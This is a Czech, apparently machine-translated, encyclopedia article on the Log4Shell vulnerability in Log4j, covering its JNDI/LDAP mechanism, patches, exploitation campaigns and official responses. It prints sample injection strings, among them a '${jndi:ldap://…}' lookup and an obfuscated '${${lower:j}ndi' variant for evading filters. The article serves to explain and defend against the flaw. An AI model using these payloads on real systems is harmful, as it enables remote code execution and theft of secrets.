Log4Shell ( CVE-2021-44228 ) je zranitelnost nultého dne v Log4j , populárním frameworku pro protokolování Java, zahrnující spuštění libovolného kódu. [1] [2] Zranitelnost – její existence nebyla spatřena od roku 2013 – byla soukromě odhalena nadací Apache Software Foundation , jejíž Log4j je projekt, Chenem Zhaojunem z bezpečnostního týmu Alibaba Cloud dne 24. listopadu 2021 a veřejně zveřejněno 9. prosince 2021. [3] [4] [5] [6] Apache udělil Log4Shellu skóre závažnosti CVSS 10, což je nejvyšší dostupné hodnocení. [7]Odhaduje se, že zneužití postihne stovky milionů zařízení a jeho použití je velmi snadné. [8] [9]
Tato chyba zabezpečení využívá skutečnosti, že Log4j umožňuje požadavky na libovolné servery LDAP a JNDI spíše než ověřování odpovědí, [1] [10] [11] umožňuje útočníkům spouštět libovolný kód Java na serveru nebo jiném počítači nebo přenášet citlivé informace. [5] Apache Security Group zveřejnila seznam dotčených softwarových projektů. [12] Mezi dotčené komerční služby patří Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ a mnoho dalších. [10] [16] [17] Podle Wiz a EY se zranitelnost dotkla 93 % podnikových cloudových prostředí. [osmnáct]
Odborníci popsali Log4Shell jako největší zranitelnost všech dob; [19] LunaSec to popsal jako „chybu návrhu katastrofických rozměrů“, [5] Tenable řekl, že zneužití bylo „největší a nejkritičtější zranitelností v historii“, [20] Ars Technica to nazvala „pravděpodobně nejzávažnější zranitelností všech dob“ . [21] a The Washington Post uvedly, že popisy bezpečnostních expertů „hraničí s apokalypsou“. [19]
Log4j je open source protokolovací knihovna , která umožňuje vývojářům softwaru protokolovat data ve svých aplikacích. Tato data mohou zahrnovat vstup uživatele. [22] Je všudypřítomný v aplikacích Java, zejména v podnikovém softwaru. [5] Původně napsaný v roce 2001 Cheki Gulcu, nyní je součástí Apache Logging Services, projektu Apache Software Foundation . [23] Bývalý člen Komise pro kybernetickou bezpečnost prezidenta Baracka Obamy Tom Kellermann popsal Apache jako „jeden z obřích pilířů mostu, který usnadňuje spojovací tkáň mezi světy aplikací a počítačovým prostředím“. [24]
Java Naming and Directory Interface ( JNDI) vám umožňuje vyhledávat objekty Java za běhu s ohledem na cestu k jejich datům. JNDI může používat několik rozhraní adresářů, z nichž každé poskytuje jiné schéma vyhledávání souborů. Mezi tato rozhraní patří Lightweight Directory Access Protocol (LDAP), protokol, který není Java [25] , který získává objektová data ve formě URL z vhodného serveru, místního nebo jakéhokoli jiného na internetu. [26]
Ve výchozí konfiguraci, když je protokolován řetězec, Log4j 2 provádí substituci řetězce ve výrazech formuláře ${prefix:name}. [26] Můžete například Text: ${java:version}převést na Text: Java version 1.7.0_67. [27] Mezi uznávané výrazy patří ${jndi:<lookup>} ; zadáním vyhledávání přes LDAP lze vyhledat libovolnou adresu URL a načíst ji jako data objektu Java. ${jndi:ldap://example.com/file}po připojení k internetu stáhne data z této adresy URL. Zadáním zaprotokolovaného řetězce může útočník stáhnout a spustit škodlivý kód hostovaný na veřejné adrese URL. [26] I když je spouštění dat zakázáno, může útočník získat data, jako jsou tajné proměnné prostředí, jejich umístěním na adresu URL, kde budou nahrazeny a odeslány na server útočníka. [28] [29] Mezi další potenciálně užitečné vyhledávací protokoly JNDI kromě LDAP patří jeho zabezpečená varianta LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) a Internet Inter-ORB Protocol (IIOP). [30] [31]
Vzhledem k tomu , že požadavky HTTP jsou často protokolovány, je běžným vektorem útoku umístění škodlivého řetězce do adresy URL požadavku HTTP nebo do často protokolované hlavičky HTTP , jako je User-Agent. Prvotní ochrana zahrnovala blokování všech požadavků obsahujících potenciálně škodlivý obsah, jako je ${jndi. [32] Naivní vyhledávání lze obejít obfuskací dotazu: například ${${lower:j}ndibude převedeno na vyhledávání JNDI po provedení operace řetězce na písmenu j. [33] I když vstup, jako je jméno, není okamžitě zaprotokolován, může být později během interního zpracování zaznamenán a jeho obsah spuštěn. [26]
Opravy této chyby zabezpečení byly vydány 6. prosince 2021, tři dny před zveřejněním této chyby zabezpečení, v Log4j verze 2.15.0-rc1. [34] [35] [36] Oprava zahrnovala omezení serverů a protokolů, které lze použít pro vyhledávání. Výzkumníci našli související chybu CVE-2021-45046, která umožňuje místní nebo vzdálené spouštění kódu v určitých nevýchozích konfiguracích a byla opravena ve verzi 2.16.0, která deaktivovala všechny funkce využívající JNDI a podporu vyhledávání zpráv. [37] [38] U předchozích verzí musí být třída org.apache.logging.log4j.core.lookup. JndiLookupodstraněna z cesty ke třídě, aby se zmírnily obě zranitelnosti. [7] [37] Dříve doporučenou opravou pro starší verze bylo nastavení systémové vlastnosti log4j2.formatMsgNoLookups truena , ale tato změna nebrání použití CVE-2021-45046. [37]
Novější verze Java Runtime Environment (JRE) také zmírňují tuto zranitelnost tím, že ve výchozím nastavení blokují vzdálené načítání kódu, i když v některých aplikacích stále existují další vektory útoku. [1] [28] [39] [40] Bylo publikováno několik metod a nástrojů, které pomáhají odhalit použití zranitelných verzí log4j ve vestavěných balících Java. [41]
Tento exploit umožňuje hackerům převzít kontrolu nad zranitelnými zařízeními pomocí Javy . [8] Někteří hackeři tuto zranitelnost využívají k tomu, aby využili zařízení obětí; včetně těžby kryptoměn , vytváření botnetů , rozesílání spamu, vytváření zadních vrátek a dalších nelegálních aktivit, jako jsou útoky ransomwaru. [8] [19] [42] Ve dnech následujících po zveřejnění zranitelnosti Check Point sledoval miliony útoků iniciovaných hackery, přičemž někteří výzkumníci pozorovali přes sto útoků za minutu, což nakonec vedlo k více než 40 % útoků. obchodní sítě vystavené mezinárodním útokům. [8] [24]
Podle generálního ředitele Cloudflare Matthew Prince se důkazy o zneužití nebo testování objevily již 1. prosince, devět dní předtím, než byly zveřejněny. [43] Podle firmy GreyNoise zabývající se kybernetickou bezpečností bylo několik IP adres seškrábnuto weby , aby zkontrolovaly servery, které mají tuto chybu zabezpečení. [44] Několik botnetů začalo hledat zranitelnost, včetně botnetu Muhstik do 10. prosince, stejně jako Mirai , Tsunami a XMRig. [8] [43] [45] 17. prosince byla společnost Conti spatřena při využívání této zranitelnosti. [19]
Některé státem podporované skupiny v Číně a Íránu také podle Check Pointu využily exploit, i když není známo, zda exploit použil Izrael, Rusko nebo USA předtím, než byla zranitelnost odhalena. [19] [46] Check Point uvedl, že 15. prosince 2021 se hackeři podporovaní Íránem pokusili infiltrovat izraelské podniky a vládní sítě. [19]
Ředitelka Agentury pro kybernetickou bezpečnost a bezpečnost infrastruktury (CISA) ve Spojených státech Jen Easterlyová popsala zneužití jako „jeden z nejzávažnějších, ne-li nejzávažnější, jaký jsem za celou svou kariéru viděl“, a vysvětlila, že byly zasaženy stovky milionů zařízení. a doporučil, aby prodejci platili za prioritní aktualizace softwaru. [8] [47] [48] Civilní agentury najaté americkou vládou měly do 24. prosince 2021 na opravu zranitelnosti, i když do té doby by to umožnilo přístup ke stovkám tisíc cílů. [19]
Kanadské centrum pro kybernetickou bezpečnost (CCCS) vyzvalo organizace, aby okamžitě zasáhly. [49] Kanadská finanční agentura dočasně deaktivovala své online služby poté, co se o zneužití dozvěděla, zatímco quebecká vláda uzavřela téměř 4 000 svých webových stránek jako „preventivní opatření“. [padesáti]
Německý Spolkový bezpečnostní úřad ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) identifikoval zneužití jako na nejvyšší úrovni ohrožení a označil jej za „extrémně kritickou nebezpečnou situaci“ (přeloženo). Řekl také, že několik útoků již bylo úspěšných a že rozsah zranitelnosti je stále obtížné posoudit. [51] [52] Nizozemské národní centrum pro kybernetickou bezpečnost (NCSC) spustilo trvalý seznam zranitelných aplikací. [53] [54]
Čínské ministerstvo průmyslu a informačních technologií pozastavilo službu Alibaba Cloud jako partnera pro analýzu kybernetických hrozeb na šest měsíců poté, co nejprve neoznámilo zranitelnost vládě. [55]
Studie Wiz a EY [18] zjistila, že 93 % cloudového podnikového prostředí bylo zranitelných vůči Log4Shell. 7 % zranitelných pracovních zátěží je dostupných online a podléhají rozsáhlým pokusům o zneužití. Podle studie bylo deset dní po zveřejnění zranitelnosti (20. prosince 2021) v cloudových prostředích v průměru záplatováno pouze 45 % postižených úloh. Cloudová data od Amazonu, Google a Microsoftu byla ovlivněna Log4Shell. [19]
HR a HR společnost UKG, jedna z největších společností v oboru, byla zasažena ransomwarovým útokem zasahujícím velké podniky. [21] [56] UKG uvedla, že nemá žádné důkazy o tom, že by při incidentu byl použit Log4Shell, ačkoli analytik Allan Liska z kybernetické společnosti Recorded Future uvedl, že zde může být souvislost. [57]
Jak větší společnosti začaly uvolňovat záplaty pro exploit, riziko pro malé podniky se zvýšilo, protože hackeři se zaměřili na zranitelnější cíle. [42]
Osobní zařízení, jako jsou chytré televize a bezpečnostní kamery připojené k internetu, byly vůči zneužití zranitelné. [19]
Ke 14. prosinci 2021 byla aktivně prozkoumána téměř polovina všech podnikových sítí na světě a během jednoho dne bylo vytvořeno více než 60 variant exploitů. [58] Check Point Software Technologies v podrobné analýze popsal situaci jako „skutečnou kybernetickou pandemii“ a potenciál škod označil za „nevyčíslitelný“. [59] Několik původních doporučení nadhodnocovalo počet zranitelných balíčků, což vedlo k falešným poplachům. Konkrétně balíček "log4j api" byl označen jako zranitelný, zatímco ve skutečnosti další vyšetřování ukázalo, že zranitelný byl pouze hlavní balíček "log4j-core".
To bylo potvrzeno jak v původním vydání [60] , tak externími bezpečnostními výzkumníky.
Technologický časopis Wired napsal, že navzdory předchozímu „hype“ kolem četných zranitelností je „hype kolem zranitelnosti Log4j... oprávněný z řady důvodů“. [46] Časopis vysvětluje, že všudypřítomnost log4j, jehož zranitelnost je pro potenciální cíle těžké odhalit, a snadnost, s jakou lze kód přenést do stroje oběti, vytvořily „kombinaci vážnosti, dostupnosti a rozšířenosti, která šokovala bezpečnostní profesionály. ." [46] Wired také schematicky představil sekvenci použití Log4Shell hackery: skupiny těžící kryptoměny budou první, kdo tuto zranitelnost zneužijí, poté datoví obchodníci prodají „předmostí“ kyberzločincům, kteří se nakonec zapojí do vydírání, špionáže a ničení dat . . [46]
Amit Göran, generální ředitel Tenable a zakládající ředitel americké Computer Emergency Preparedness Group , uvedl: „[Log4Shell] je zdaleka největší a nejkritičtější zranitelnost v historii“, poznamenal, že sofistikované útoky začaly krátce po chybě a uvedl: „My také již vidíme, že se používá k útokům ransomwaru, což by opět mělo být hlavním probuzením... Také jsme viděli zprávy o útočnících, kteří používají Log4Shell ke zničení systémů, aniž by se pokusili získat výkupné - celkem neobvyklé chování." . [46] Seniorský výzkumník hrozeb společnosti Sophos Sean Gallagher řekl: „Abych byl upřímný, největší hrozbou je, že lidé již získali přístup a právě jej využívají, a i když problém vyřešíte, někdo je již online... Bude existovat tak dlouho jako internet." [dvacet]
| Hackerské útoky z roku 2020 | |
|---|---|
| Největší útoky | |
| Skupiny a komunity hackerů |
|
| Zjištěna kritická zranitelnost |
|
| Počítačové viry | |
| 2000 • 2010 • 2020 | |